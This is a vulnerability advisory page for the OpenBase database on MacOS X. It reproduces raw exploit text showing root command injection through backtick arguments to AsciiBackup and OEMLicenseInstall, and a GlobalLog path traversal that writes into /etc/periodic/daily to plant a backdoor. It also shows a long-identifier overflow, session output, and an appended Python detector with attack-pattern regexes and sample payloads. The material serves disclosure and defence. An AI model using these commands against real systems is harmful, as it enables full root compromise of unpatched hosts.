Vendor: OpenBase
By:
CVSS: 7.5 (HIGH)
Buffer-Overflow, Remote Command Execution
CWE: Buffer-Overflow, Command Injection
Product Name: OpenBase
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: MacOS X

OpenBase Buffer-Overflow and Remote Command Execution Vulnerabilities

The OpenBase software is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities. An attacker can exploit these issues to execute arbitrary code or commands with superuser privileges, leading to the complete compromise of affected computers. The 'AsciiBackup()' and 'OEMLicenseInstall()' functions run backtick-quoted commands in their arguments as root, and 'GlobalLog()' accepts a path containing '../' sequences, which lets a caller create root-owned files. In addition, a 'select' statement built from long runs of 'a' characters results in 'zone_free()' issues referencing 0x61616161, the ASCII encoding of four 'a' characters from the query.

Mitigation:

The vendor has not released a patch for these vulnerabilities. It is recommended to restrict access to the affected software and monitor for any suspicious activity.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/26347/info

OpenBase is prone to a buffer-overflow vulnerability and multiple remote command-execution vulnerabilities.

An attacker could exploit these issues to execute arbitrary code or commands with superuser privileges. Successfully exploiting these issues will facilitate the complete compromise of affected computers.

1. call AsciiBackup('`id`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
----------
Success
----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1>  call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
----------
Failure
----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root
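
Since no patch exists and the mitigation above is to restrict access and monitor, the following is an added detection example, not part of the original advisory or of OpenBase. It assumes complete SQL statements are available as strings (for example from a query log or a proxy in front of the database, which the advisory does not describe); the function name, tag names and the MAX_IDENT threshold are hypothetical.

```python
import re

# Functions the advisory shows reaching a root shell or a root-owned file write.
RISKY = ("AsciiBackup", "GlobalLog", "OEMLicenseInstall")
CANON = {name.lower(): name for name in RISKY}
CALL_RE = re.compile(r"\bcall\s+(%s)\s*\((.*)\)" % "|".join(RISKY),
                     re.IGNORECASE | re.DOTALL)
# Backticks are what the advisory uses; $( and ; | & are added on the
# assumption that the argument is handed to a shell.
SHELL_META = re.compile(r"`|\$\(|[;|&]")
TRAVERSAL = re.compile(r"\.\./")
MAX_IDENT = 128  # assumed limit; set it to the longest legitimate identifier
LONG_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]{%d,}" % MAX_IDENT)


def inspect_statement(statement):
    """Return sorted finding tags for one complete SQL statement."""
    findings = set()
    match = CALL_RE.search(statement)
    if match:
        proc = CANON[match.group(1).lower()]  # report the canonical spelling
        args = match.group(2)
        if SHELL_META.search(args):
            findings.add("shell-meta:" + proc)
        if TRAVERSAL.search(args):
            findings.add("traversal:" + proc)
    # Item 3: very long runs of identifier characters anywhere in the statement.
    if LONG_IDENT.search(statement):
        findings.add("long-identifier")
    return sorted(findings)


# Constructed sample statements; the first two follow the advisory's items 1 and 2.
SAMPLES = [
    "call AsciiBackup('`id`')",
    'call GlobalLog("../../../path/to/file", "note")',
    "call AsciiBackup('/backups/nightly')",
    "select " + "a" * 300 + " from " + "a" * 300,
    "select title from movies",
]

if __name__ == "__main__":
    for stmt in SAMPLES:
        hits = inspect_statement(stmt)
        print("ALERT" if hits else "ok   ", hits, stmt[:60])
```

The matcher expects a whole statement per string, so input typed across several isql lines has to be joined up to the terminating "go" before it is inspected.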